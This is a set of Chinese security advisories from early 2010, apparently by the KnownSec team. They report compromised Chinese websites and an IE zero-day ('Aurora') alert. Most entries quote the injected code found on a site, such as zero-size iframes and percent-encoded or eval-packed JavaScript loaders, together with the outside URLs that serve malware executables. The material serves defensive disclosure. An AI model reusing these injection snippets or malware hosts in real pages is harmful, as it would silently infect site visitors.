知道创宇

发布时间：Sun Jan 31 2010 20:50:07 UTC+0800
最后更新时间：Sun 31 2010 20:50:07 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：梦虎调查新闻网
网站链接：http://news12315.com/
恶意代码：
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>
所在页面：http://news12315.com/
下载病毒：
http://abf.bij.pl/l/ss.exe
其他机构判定结果：
google:安全

网站名称：耒阳之窗
网站链接：http://chinaleiyang.com/
恶意代码：
<script language=javascript src=http://h%69r.x%6Frg.%70l/c.js?google_ad=01×1101_ad></script>
所在页面：http://chinaleiyang.com/
下载病毒：
http://abf.bij.pl/l/ss.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 13% [?]

发布时间：Fri Jan 29 2010 17:50:07 UTC+0800
最后更新时间：Fri Jan 29 2010 17:50:07 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：山东同济律师事务所
网站链接：http://tongjilawyer.com/
恶意代码：
<script language=javascript src=http://h%64v.x%6Frg.%70l/c.js?google_ad=12×312_ad></script>
所在页面：http://tongjilawyer.com/
下载病毒：
http://aba.bij.pl/l/qq.exe
其他机构判定结果：
google:安全

网站名称：牛盘网
网站链接：http://www.niupan.com/
恶意代码：
document.writeln(”<iframe src=http://club.9istyle.com/wap/include/main/logo.html?3321 width=0 height=0><\/iframe>”);
所在页面：http://img0.niupan.com/html/tiyu/zt/360.jpg?atiryb
下载病毒：
http://club.9istyle.com/wap/include/lsass.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 13% [?]

发布时间：Wed Jan 27 2010 20:24:24 UTC+0800
最后更新时间：Wed Jan 27 2010 20:24:24 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：照片处理网论坛
网站链接：http://bbs.photops.com/
恶意代码：
if(document.cookie.indexOf(’helio’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’helio=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’4.5(\’<0 3=2 1=”6://d.7.c/b/a.8?9″></0>\’)',14,14,’script|src|javascript|language|document|writeln|http|xcdx169|js|IFHIFG|log|include|net|bbs’.split(’|'),0,{}));}
所在页面：http://bbs.photops.com/forumdata/cache/common.js?j81
下载病毒：
http://game.hsw.cn/plus/img/log.css
其他机构判定结果：
google:恶意

网站名称：中关村投融资网
网站链接：http://www.zgctrz.com.cn/
恶意代码：
<script language=javascript src=http://h%69h.x%6Frg.%70l/c.js?google_ad=01×501_ad></script>
所在页面：http://www.zgctrz.com.cn/
下载病毒：
http://aau.bij.pl/l/oo.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 11% [?]

发布时间：Sun Jan 24 2010 23:51:47 UTC+0800
最后更新时间：Sun Jan 24 2010 23:51:47 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：中国远程医疗网
网站链接：http://www.chthn.com/
恶意代码：
document.write(”<iframe width=’0′ height=’0′ src=’http://www.qtdyf.cn/swf/muma.html’></iframe>”);
所在页面：http://www.chthn.com/js/msclass.js
下载病毒：
http://www.qtdyf.cn/swf/host.exe
其他机构判定结果：
google:恶意

网站名称：深圳高新技术产品出口基地
网站链接：http://exportbase.ship.gov.cn/
恶意代码：
<script src=http://a.ll8cc.cn></script>
所在页面：http://exportbase.ship.gov.cn/
下载病毒：
http://99.qq66.in/baidu2.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 12% [?]

发布时间：Thu Jan 21 2010 21:24:13 UTC+0800
最后更新时间：Thu Jan 21 2010 21:24:13 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：中国安检排爆网
网站链接：http://www.chinacs110.com/
恶意代码：
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’8.d(”<b c=9://%1%6%2%7%7%0%3%4%2%5/e.a></b>”)’,62,15,’2E|64|66|69|6E|6F|73|7A|document|http|js|script|src|write|z’.split(’|'),0,{}))
所在页面：http://www.chinacs110.com/scripts/ac_runactivecontent.js
下载病毒：
http://my.xingan5.cn:8886/Down/my/2011.exe
其他机构判定结果：
google:安全

网站名称：顺风车网
网站链接：http://www.shunfengche.com/
恶意代码：
<iframe src=http://88aa.0794e.com.cn:3000/360/3016/index.html width=1 height=1></iframe>
所在页面：http://www.shunfengche.com/
下载病毒：
http://my.xingan5.cn:8886/down/my/3016.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 11% [?]

发布时间：Mon Jan 18 2010 18:57:20 UTC+0800
最后更新时间：Mon Jan 18 2010 18:57:20 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：顺风车网
网站链接：http://shunfengche.com/
恶意代码：
<iframe src=http://88aa.0794e.com.cn:3000/360/3016/index.html width=1 height=1></iframe>
所在页面：http://shunfengche.com/
下载病毒：
http://my.xingan5.cn:8886/down/my/3016.exe
其他机构判定结果：
google:安全

网站名称：安徽教育网
网站链接：http://www.ahedu.gov.cn/
恶意代码：
<iframe src=http://2008.ahedu.gov.cn/ct14.htm width=0 height=0></iframe>
所在页面：http://2008.ahedu.gov.cn/
下载病毒：
http://saomiao.vicp.net/s.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 12% [?]

发布时间：2010-1-16 11：30 (UTC+0800)

漏洞警报 程度：严重

影响范围：IE6-IE8（除IE5.01 SP4之外）

——————–

近日google与adobe均公开宣布被黑客攻击，此次攻击被外界命名为Auroro（极光）。

mcafee公司在第一时间披露了关于攻击内容的相关细节，其中提到了黑客使用了ie浏览器的未知漏洞，意图通过该漏洞渗透进入公司内部窃取源代码。

知道创宇安全团队（KnownSec Team）通过网上披露的信息构造测试样本，确认了该漏洞的存在，并且其影响范围广泛，可能会被利用于大规模挂马攻击并且造成严重危害。 

该漏洞进行攻击主要通过用户使用ie系列浏览器访问精心构造的漏洞攻击页面，攻击成功后将在用户机器以用户当前权限执行任意代码，完全控制用户主机。

  预计在本月内将会有攻击者会构造出用于大规模挂马攻击的恶意代码页面，并且投入挂马攻击中使用，请广大网民关注微软的补丁更新，及时安装补丁程序，抵御针对该漏洞发起的大规模恶意攻击，或者安装安全软件来减少攻击所带来的威胁，可使用365门神防御未知浏览器漏洞，降低来自互联网的安全威胁。

知道创宇恶意网站监控中心可以完全检测利用该漏洞攻击的恶意网站，在大规模攻击利用时将可以在第一时间进行捕获进行进一步的警报。

防御方案：

 1. 目前微软承诺尽快推出对应的补丁程序，请打开自动更新，及时安装补丁。

 2. 开启浏览器DEP攻击用于抵御浏览器漏洞攻击。

开启DEP保护方法： 系统属性——高级——性能——数据执行保护

 3. 推荐安装安全软件来减少攻击所带来的威胁，可使用365门神防御未知浏览器漏洞。

 知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/

推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 14% [?]

发布时间：Fri Jan 15 2010 22:33:48 UTC+0800
最后更新时间：Fri Jan 15 2010 22:33:48 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：上海中铁快运
网站链接：http://www.021zhongtiekuaiyun.com.cn/
恶意代码：
<iframe src=http://www.yjsjl.cn/css/index.html width=0 height=0></iframe>
所在页面：http://www.021zhongtiekuaiyun.com.cn/
下载病毒：
http://www.yjsjl.cn/css/time.exe
其他机构判定结果：
google:安全

网站名称：七七图书比价网
网站链接：http://www.pkgoushu.cn/
恶意代码：
<script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E></script>
所在页面：http://www.pkgoushu.cn/
下载病毒：
http://cocoexe.8gcc.com:8886/Down/my/2005.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 10% [?]

发布时间：Wed Jan 13 2010 19:40:20 UTC+0800
最后更新时间：Wed Jan 13 2010 19:40:20 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：37度女人杂志
网站链接：http://www.37women.com/
恶意代码：
<iframe src=http://asdfa.0903w.com.cn:169/360/22/index.html width=1 height=1></iframe>
所在页面：http://www.37women.com/
下载病毒：
http://my.xingan5.cn:8886/down/my/22.exe
其他机构判定结果：
google:安全

网站名称：北京一获法律书店
网站链接：http://www.cnlawbooks.com/
恶意代码：
<script src=http://z360.ne%54/c.js></script>
所在页面：http://www.cnlawbooks.com/
下载病毒：
http://cocoexe.8gcc.com:8886/Down/my/2005.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 10% [?]

发布时间：Tue Jan 12 2010 23:45:37 UTC+0800
最后更新时间：Tue Jan 12 2010 23:45:37 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：中国九型人格学院
网站链接：http://www.cnenn.cn/
恶意代码：
document.writeln(’<script src=http://ufy9g1.chinaw3.com/j/1.gif></script>’)
所在页面：http://www.cnenn.cn/include/dedeajax2.js
下载病毒：
http://my.xingan5.cn:8886/down/my/3012.exe
其他机构判定结果：
google:安全

网站名称：中国水稻网
网站链接：http://www.riceinfo.cn/
恶意代码：
<script src=http://%64%73%66%7A%7A%2E%69%6E%66%6F/z.js></script>
所在页面：http://www.riceinfo.cn/
下载病毒：
http://cocoexe.8gcc.com:8886/Down/my/2011.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 9% [?]